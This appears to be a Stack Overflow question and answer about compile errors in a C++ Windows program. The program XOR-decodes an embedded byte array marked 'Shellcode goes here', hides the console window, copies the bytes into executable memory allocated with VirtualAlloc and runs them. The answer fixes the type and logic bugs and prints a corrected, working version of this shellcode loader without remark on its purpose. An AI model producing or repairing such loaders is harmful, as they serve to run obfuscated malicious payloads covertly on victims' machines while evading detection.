# Compilation showing me error, not in scope in C++

Tags: c++, arrays

```
#include <windows.h>
#include <iostream>

int main(int argc, char* argv[])
{

    char a[] = { 0xc4, 0xe0, 0x8, 0x49, 0x11, 0x9e, 0xd7, 0x97, 0x68 }; //Shellcode goes here;
    char b = [sizeof a];

    for (int i = 0; i < b; i++) {
        a[i] = b[i] ^ 'KEY';
    }

    ShowWindow(GetConsoleWindow(), SW_HIDE);

    void* exec = VirtualAlloc(0, sizeof b, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, b, sizeof b);
    ((void (*)())exec)();
}
```

But it is showing me such an error when compiling with mingw32-gcc compiler in linux....

```
loader.cpp: In function ‘int main(int, char**)’:
loader.cpp:8:66: error: narrowing conversion of ‘196’ from ‘int’ to ‘char’ [-Wnarrowing]
    8 |     char a[]={0xc4, 0xe0, 0x8, 0x49, 0x11, 0x9e, 0xd7, 0x97, 0x68}; //Shellcode goes here;
      |                                                                  ^
loader.cpp:8:66: error: narrowing conversion of ‘224’ from ‘int’ to ‘char’ [-Wnarrowing]
loader.cpp:8:66: error: narrowing conversion of ‘158’ from ‘int’ to ‘char’ [-Wnarrowing]
loader.cpp:8:66: error: narrowing conversion of ‘215’ from ‘int’ to ‘char’ [-Wnarrowing]
loader.cpp:8:66: error: narrowing conversion of ‘151’ from ‘int’ to ‘char’ [-Wnarrowing]
loader.cpp:9:15: error: expected identifier before ‘sizeof’
```

Comment: What do you mean by "not in scope?" That's nowhere in the error log.

Comment: Several of your constants in that array are too big for a `char`. Maybe use `unsigned char` instead. And what are you trying to do with `char b = [sizeof a];`?

Comment: `'KEY'` is a multicharacter literal and almost certainly not what you mean to do.

Comment: Does this answer your question? [How to initialize char array using hex numbers?](https://stackoverflow.com/questions/19715439/how-to-initialize-char-array-using-hex-numbers)

Comment: It looks like your compiler makes `char` signed (either `signed` or `unsigned` is allowed). The simplest fix is to change `a` to `unsigned char a[] = ...`. That way, all the values will fit.

Answer (score 1):

- You should use `unsigned char` instead of `char` because `char` may be signed, depending on the environment.
- You have an extra `=` in the declaration of `b`.
- The condition `i < b` is wrong. it is comparing an integer with a pointer (converted from the array). It should be `i < sizeof b`. `i` may have to be an unsigned type to avoid warnings.
- `a[i] = b[i]^'KEY';` also looks wrong. You probably want `b[i] = a[i]^'KEY';`. Otherwise `b` is left uninitialized.

Fixed code:

```
#include <windows.h>
#include <iostream>

int main(int argc, char *argv[]){

    unsigned char a[]={0xc4, 0xe0, 0x8, 0x49, 0x11, 0x9e, 0xd7, 0x97, 0x68};//Shellcode goes here;
    unsigned char b[sizeof a];

    for(size_t i = 0; i < sizeof b ; i++ ){
       b[i] = a[i]^'KEY';
    }

    ShowWindow(GetConsoleWindow(), SW_HIDE);
    
    void *exec = VirtualAlloc(0, sizeof b, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, b, sizeof b);
    ((void(*)())exec)();
}
```

Also note that `'KEY'` is a *multiple-charcter character constant* and has an implementation-defined value, which may not what you want.

Comment: `i < b` is also wrong.

Comment: @interjay Thanks. I found `a[i] = b[i]^'KEY';` is also wrong.